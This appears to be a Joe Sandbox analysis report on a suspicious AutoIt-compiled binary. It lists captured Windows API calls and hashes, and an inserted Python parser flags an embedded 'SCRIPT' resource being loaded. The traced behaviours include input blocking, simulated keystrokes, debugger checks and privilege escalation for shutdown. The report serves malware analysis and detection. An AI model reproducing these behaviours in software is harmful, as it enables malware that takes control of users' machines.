• DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 009FDA88
• MoveFileW.KERNEL32(?,?), ref: 009FDA9B
• DeleteFileW.KERNEL32(?,?,?,?), ref: 009FDAB8
• FindNextFileW.KERNEL32(00000000,00000010), ref: 009FDAE2
  • Part of subcall function 009FDB47: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,009FDAC7,?,?), ref: 009FDB5D
• FindClose.KERNEL32(00000000,?,?,?), ref: 009FDAFE
• FindClose.KERNEL32(00000000), ref: 009FDB0F
Similarity
• API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
• String ID: \*.*
• API String ID: 1946585618-1173974218
• Opcode ID: 563d9929a130949c2d3f0171134d108a4df8ea82ce5fd2cc4192f32d28dde7dd
• Instruction ID: 37e7fb2ca8e958cb0893fe292c64f589c8e05f011a2bccd128f39f5d46556256
• Opcode Fuzzy Hash: 563d9929a130949c2d3f0171134d108a4df8ea82ce5fd2cc4192f32d28dde7dd
• Instruction Fuzzy Hash: 33615E7180610DAECF15EBE4DA92AFDB7B9AF54301F2040A5E50577192EB359F0ACB60
Similarity
• API ID: Clipboard$AllocCloseEmptyGlobalOpen
• String ID:
• API String ID: 1737998785-0
• Opcode ID: 54423984b4498277686998d12d38d23d4c2add64c16e6820537e8b8b1d4184ab
• Instruction ID: d9b77e48051cd21362b02ca441d115f21dc26eb4939250e04a671ff7b772c4db
• Opcode Fuzzy Hash: 54423984b4498277686998d12d38d23d4c2add64c16e6820537e8b8b1d4184ab
• Instruction Fuzzy Hash: 72419C30604605EFD720CF59E888F65BBE4EF44318F14C0A8E8199FAA2CB35EC46CB90
APIs
  • Part of subcall function 009F2010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 009F205A
  • Part of subcall function 009F2010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 009F2087
  • Part of subcall function 009F2010: GetLastError.KERNEL32 ref: 009F2097
• ExitWindowsEx.USER32(?,00000000), ref: 009FF249
Similarity
• API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
• String ID: $ $@$SeShutdownPrivilege
• API String ID: 2234035333-3163812486
• Opcode ID: bdb1d65448d962d5879e19ce03152304450c90ae1726a8be5fb7673c4d11f29c
• Instruction ID: 7d1932522b7c1ef3cad46bcac52357f2837d58188e08432181cb0d095b20dc15
• Opcode Fuzzy Hash: bdb1d65448d962d5879e19ce03152304450c90ae1726a8be5fb7673c4d11f29c
• Instruction Fuzzy Hash: FC01DB766102186BEB2462BC5C99FFE725C9F04354F150931FF23E21D2D6644D059390
APIs
• _free.LIBCMT ref: 009CBD54
• _free.LIBCMT ref: 009CBD78
• _free.LIBCMT ref: 009CBEFF
• GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00A346D0), ref: 009CBF11
• WideCharToMultiByte.KERNEL32(00000000,00000000,00A6221C,000000FF,00000000,0000003F,00000000,?,?), ref: 009CBF89
• WideCharToMultiByte.KERNEL32(00000000,00000000,00A62270,000000FF,?,0000003F,00000000,?), ref: 009CBFB6
• _free.LIBCMT ref: 009CC0CB
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 314583886-0
                                                                                                                                                                                                                                  • Opcode ID: 1a457bc876b1e1b00f53586fe247186fde5a8c991a95c71f6b398a4b89b52767
                                                                                                                                                                                                                                  • Instruction ID: 84b2e132013df11613e709c0674ddca85ca6311a0c71e8eae9027c92e6d395c4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1a457bc876b1e1b00f53586fe247186fde5a8c991a95c71f6b398a4b89b52767
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 81C11871D002049BDB20EF78DC52FEA7BBCEF85720F1445AEE5559B291E7309E428B92
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,009D56C2,?,?,00000000,00000000), ref: 00A03A1E
                                                                                                                                                                                                                                  • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,009D56C2,?,?,00000000,00000000), ref: 00A03A35
                                                                                                                                                                                                                                  • LoadResource.KERNEL32(?,00000000,?,?,009D56C2,?,?,00000000,00000000,?,?,?,?,?,?,009966CE), ref: 00A03A45
                                                                                                                                                                                                                                  • SizeofResource.KERNEL32(?,00000000,?,?,009D56C2,?,?,00000000,00000000,?,?,?,?,?,?,009966CE), ref: 00A03A56
                                                                                                                                                                                                                                  • LockResource.KERNEL32(009D56C2,?,?,009D56C2,?,?,00000000,00000000,?,?,?,?,?,?,009966CE,?), ref: 00A03A65
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                                                                                                                                  • String ID: SCRIPT
                                                                                                                                                                                                                                  • API String ID: 3051347437-3967369404
                                                                                                                                                                                                                                  • Opcode ID: a4baf11ece2cc249ab5ce2cfed1e6fa1a6c98e139d119cc3cf1388b8dad2c74e
                                                                                                                                                                                                                                  • Instruction ID: 8b0a73bdd408454ce0610bad8766254492f0418929dd78ddc6c9ffe6f677009c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a4baf11ece2cc249ab5ce2cfed1e6fa1a6c98e139d119cc3cf1388b8dad2c74e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9F113C71200705BFEB318B69EC48F677BBDEBC5B91F14466CB54296190DBB2D9028660
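The entry above is the standard Win32 sequence for reading a blob out of the binary's own resource section: FindResourceExW is called with resource type 0000000A (the RT_RCDATA constant) and the name SCRIPT, then LoadResource, SizeofResource and LockResource map it, and CreateStreamOnHGlobal wraps the bytes in a stream. Reports like this one list dozens of such entries, so it is worth parsing the "APIs" lines mechanically rather than reading them by eye. The following is an added example, not Joe Sandbox code: it parses listing lines in the format shown on this page into records (including the indented "Part of subcall function" lines), orders a function's direct calls by their ref address, and flags the RT_RCDATA-by-name load chain. The sample text is copied from this page's entries; the interpretation that the chain indicates an embedded payload being staged is an assumption, and the extra trailing values in each call are treated as stack slots beyond the API's real parameters, which is how the listing presents them.

```python
"""Parse Joe Sandbox "APIs" listing lines and flag an RT_RCDATA resource load chain.

Added example for this report, not Joe Sandbox's own code. The line grammar is
inferred from the entries on this page:
    [• Part of subcall function <addr>:] • <Api>.<MODULE>[(<args>)], ref: <addr>
"""
import re
from dataclasses import dataclass
from typing import List, Optional

RT_RCDATA = 10  # Win32 resource type passed as lpType; shown as 0000000A in the listing

API_LINE = re.compile(
    r"^\s*(?:•\s*)?"
    r"(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?"          # _free.LIBCMT has no argument list at all
    r",?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]            # raw stack slots as printed; '?' means unresolved
    ref: int                   # address of the call site
    subcall_of: Optional[int]  # callee address when the line is a nested "subcall" entry


def parse_api_listing(text: str) -> List[ApiCall]:
    """Turn listing lines into ApiCall records; headings and hash lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
        sub = int(m["sub"], 16) if m["sub"] else None
        calls.append(ApiCall(m["api"], m["mod"], args, int(m["ref"], 16), sub))
    return calls


def call_order(calls: List[ApiCall]) -> List[str]:
    """Direct calls of the function in address order.

    The listing is not sorted by address (FindClose at 00A0A6D0 is printed before
    Sleep at 00A0A5ED), so sorting by ref recovers the static call order.
    """
    return [c.api for c in sorted((c for c in calls if c.subcall_of is None),
                                  key=lambda c: c.ref)]


def loads_named_rcdata(calls: List[ApiCall], name: str = "SCRIPT") -> bool:
    """True when the function locates an RT_RCDATA resource called `name` and then
    maps it with LoadResource followed by LockResource at higher addresses.

    FindResourceExW(hModule, lpType, lpName, wLanguage): only the first four slots
    are real parameters; the listing prints more stack values after them.
    """
    direct = sorted((c for c in calls if c.subcall_of is None), key=lambda c: c.ref)
    for i, c in enumerate(direct):
        if (c.api == "FindResourceExW" and len(c.args) >= 3
                and c.args[1] == f"{RT_RCDATA:08X}" and c.args[2] == name):
            later = [d.api for d in direct[i + 1:]]
            try:
                return later.index("LockResource") > later.index("LoadResource")
            except ValueError:
                return False
    return False


# Constructed samples, copied from two function entries on this page.
SAMPLE_RESOURCE = """APIs
• CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,009D56C2,?,?,00000000,00000000), ref: 00A03A1E
• FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,009D56C2,?,?,00000000,00000000), ref: 00A03A35
• LoadResource.KERNEL32(?,00000000,?,?,009D56C2,?,?,00000000,00000000,?,?,?,?,?,?,009966CE), ref: 00A03A45
• SizeofResource.KERNEL32(?,00000000,?,?,009D56C2,?,?,00000000,00000000,?,?,?,?,?,?,009966CE), ref: 00A03A56
• LockResource.KERNEL32(009D56C2,?,?,009D56C2,?,?,00000000,00000000,?,?,?,?,?,?,009966CE,?), ref: 00A03A65
Strings
"""

SAMPLE_FIND = """APIs
  • Part of subcall function 0099B329: _wcslen.LIBCMT ref: 0099B333
• FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00A0A5BD
• FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00A0A6D0
• Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00A0A5ED
• FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00A0A6BA
"""

if __name__ == "__main__":
    for label, text in (("resource loader", SAMPLE_RESOURCE), ("directory walk", SAMPLE_FIND)):
        calls = parse_api_listing(text)
        print(label, call_order(calls), "RCDATA 'SCRIPT' chain:", loads_named_rcdata(calls))
```

Run the module directly to see both samples classified; the directory-walk entry is there to show that the subcall line is parsed but kept out of the ordering, and that the FindFirstFileW, Sleep, FindNextFileW, FindClose loop comes out in address order. Feeding the whole exported report through parse_api_listing and grouping by function lets you list every function that stages a named RCDATA resource, or any other chain you encode in a small predicate like loads_named_rcdata.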
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 009F1900: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 009F1916
                                                                                                                                                                                                                                    • Part of subcall function 009F1900: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 009F1922
                                                                                                                                                                                                                                    • Part of subcall function 009F1900: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 009F1931
                                                                                                                                                                                                                                    • Part of subcall function 009F1900: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 009F1938
                                                                                                                                                                                                                                    • Part of subcall function 009F1900: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 009F194E
                                                                                                                                                                                                                                  • GetLengthSid.ADVAPI32(?,00000000,009F1C81), ref: 009F20FB
                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000000), ref: 009F2107
                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 009F210E
                                                                                                                                                                                                                                  • CopySid.ADVAPI32(00000000,00000000,?), ref: 009F2127
                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000,009F1C81), ref: 009F213B
                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 009F2142
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3008561057-0
                                                                                                                                                                                                                                  • Opcode ID: f3959b7a91577af97fdca7f4be1797ab215c1f0a1068df814959d401ca880b09
                                                                                                                                                                                                                                  • Instruction ID: 2534629fabc0a834a1a9fdb7abefdce9eb06174030ca23cf08c2bd9dc454143b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f3959b7a91577af97fdca7f4be1797ab215c1f0a1068df814959d401ca880b09
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3111AC72600209EFDB20DBA8DC09BBE7BB9EF45355F244528EA4697120C7359D42CBA4
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0099B329: _wcslen.LIBCMT ref: 0099B333
                                                                                                                                                                                                                                  • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00A0A5BD
                                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00A0A6D0
                                                                                                                                                                                                                                    • Part of subcall function 00A042B9: GetInputState.USER32 ref: 00A04310
                                                                                                                                                                                                                                    • Part of subcall function 00A042B9: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00A043AB
                                                                                                                                                                                                                                  • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00A0A5ED
                                                                                                                                                                                                                                  • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00A0A6BA
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                                                                                                                                                                                                  • String ID: *.*
                                                                                                                                                                                                                                  • API String ID: 1972594611-438819550
                                                                                                                                                                                                                                  • Opcode ID: e8d5da03dd22cde29b18c31d43e49069a93c51ec862230b54994b5f0c167580c
                                                                                                                                                                                                                                  • Instruction ID: 09301c5958ce246d3db2bec8499a4d9ac48fd8d03529f935c4fa8c58269f030a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e8d5da03dd22cde29b18c31d43e49069a93c51ec862230b54994b5f0c167580c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 89414E7190020EAFCF14DFA8ED49AEEBBB8BF55310F244065E805A21D1EB319E85CB61
APIs
• DefDlgProcW.USER32(?,?), ref: 0099233E
• GetSysColor.USER32(0000000F), ref: 00992421
• SetBkColor.GDI32(?,00000000), ref: 00992434
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: Color$Proc
• String ID:
• API String ID: 929743424-0
APIs
  • Part of subcall function 00A13AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00A13AD7
  • Part of subcall function 00A13AAB: _wcslen.LIBCMT ref: 00A13AF8
• socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00A122BA
• WSAGetLastError.WSOCK32 ref: 00A122E1
• bind.WSOCK32(00000000,?,00000010), ref: 00A12338
• WSAGetLastError.WSOCK32 ref: 00A12343
• closesocket.WSOCK32(00000000), ref: 00A12372
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
• String ID:
• API String ID: 1601658205-0
APIs
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: Window$EnabledForegroundIconicVisibleZoomed
• String ID:
• API String ID: 292994002-0
APIs
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: LocalTime
• String ID: %.3d$X64
• API String ID: 481472006-1077770165
APIs
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,0000000A), ref: 009C2A8A
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0000000A), ref: 009C2A94
• UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,0000000A), ref: 009C2AA1
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: ExceptionFilterUnhandled$DebuggerPresent
• String ID:
• API String ID: 3906539128-0
APIs
• GetUserNameW.ADVAPI32(?,?), ref: 009EE664
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: NameUser
• String ID: X64
• API String ID: 2645101109-893830106
                                                                                                                                                                                                                                  • Opcode ID: bd54d033d04f9476b59e697a7db74827f28d0fa2736c015dfbec2896b7f9324b
                                                                                                                                                                                                                                  • Instruction ID: e1d76165269ad6fdc22bf20de6300eb36be1506b5ff04c5cc0b54e3359c8601d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bd54d033d04f9476b59e697a7db74827f28d0fa2736c015dfbec2896b7f9324b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 96D0C9B580511DEADF90CB90ECC8DD973BCBB04304F100A61F106A2010D73495498B14
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00A152EE,?,?,00000035,?), ref: 00A04229
                                                                                                                                                                                                                                  • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00A152EE,?,?,00000035,?), ref: 00A04239
Similarity
• API ID: ErrorFormatLastMessage
• String ID:
• API String ID: 3479602957-0
• Opcode ID: e7a7f0a72f0be50a17211a3fcd8c062029f47793f7c1acb41c0780dd05e9a394
• Instruction ID: ac09bb43b2eebc29785d082a201b5d32f6316b168b678e85281b6ad9588add18
• Opcode Fuzzy Hash: e7a7f0a72f0be50a17211a3fcd8c062029f47793f7c1acb41c0780dd05e9a394
• Instruction Fuzzy Hash: 48F0A0707002286AEB2097A9AC4DFEB366DEFC9761F100275B605D2281DA709901C6B0
APIs
• SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 009FBC24
• keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 009FBC37
Similarity
• API ID: InputSendkeybd_event
• String ID:
• API String ID: 3536248340-0
• Opcode ID: 1c510770bd215d713d62ecdf71b7b0d65db13abaa5d50baa0172bd53a359a322
• Instruction ID: 3a130586e2afeed6ceff00f28616c4d43333a6a81f49686ff40f648cd5a6daf2
• Opcode Fuzzy Hash: 1c510770bd215d713d62ecdf71b7b0d65db13abaa5d50baa0172bd53a359a322
• Instruction Fuzzy Hash: ABF06D7080024DABDB01DFA4C806BBF7BB4FF04309F148419FA51A5192C37D8202DF94
APIs
• BlockInput.USER32(00000001), ref: 00A0F51A
Similarity
• API ID: BlockInput
• String ID:
• API String ID: 3456056419-0
• Opcode ID: f5a112b9bdc8973bc8da1d15afc807ee3c0532ac6b27b823e94b03d0804be443
• Instruction ID: 849ef84f347d02702ef0149c2f5345f770f3a79a5e7493271019bb17949e1ad2
• Opcode Fuzzy Hash: f5a112b9bdc8973bc8da1d15afc807ee3c0532ac6b27b823e94b03d0804be443
• Instruction Fuzzy Hash: 89E048312102049FDB20DF6DE804E56F7E8BFA4761F008425F84AD7351D670F9418B90
APIs
• mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 009FECC7
Similarity
• API ID: mouse_event
• String ID:
• API String ID: 2434400541-0
• Opcode ID: 77441843f73617bbaa2adc406632e21aa5e1e099b1c4f0b9235db5f6e027b655
• Instruction ID: 732eec5d720c5ab6d08e1d03003f45d310ab6106d23f9df79c21c2bb850aa8eb
• Opcode Fuzzy Hash: 77441843f73617bbaa2adc406632e21aa5e1e099b1c4f0b9235db5f6e027b655
• Instruction Fuzzy Hash: E5D05EBE19420838E82D4B3C8E2FB76260DE701741F988A59B382C96F9E5D59901A221
APIs
• SetUnhandledExceptionFilter.KERNEL32(Function_00020D51,009B075E), ref: 009B0D4A
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
• Opcode ID: f65eee34e6184a65e0fd27f779edc74b321097dd725d9479294656444ca315bc
• Instruction ID: a132f72cec56e1cf44e65a7226d9cc992b8b7e1a8acb1f847b0d5b1494532371
• Opcode Fuzzy Hash: f65eee34e6184a65e0fd27f779edc74b321097dd725d9479294656444ca315bc
• Instruction Fuzzy Hash:
APIs
• DeleteObject.GDI32(00000000), ref: 00A1358D
• DeleteObject.GDI32(00000000), ref: 00A135A0
• DestroyWindow.USER32 ref: 00A135AF
• GetDesktopWindow.USER32 ref: 00A135CA
• GetWindowRect.USER32(00000000), ref: 00A135D1
• SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00A13700
• AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00A1370E
• CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A13755
• GetClientRect.USER32(00000000,?), ref: 00A13761
• CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00A1379D
                                                                                                                                                                                                                                  • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A137BF
                                                                                                                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A137D2
                                                                                                                                                                                                                                  • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A137DD
                                                                                                                                                                                                                                  • GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A137E6
                                                                                                                                                                                                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A137F5
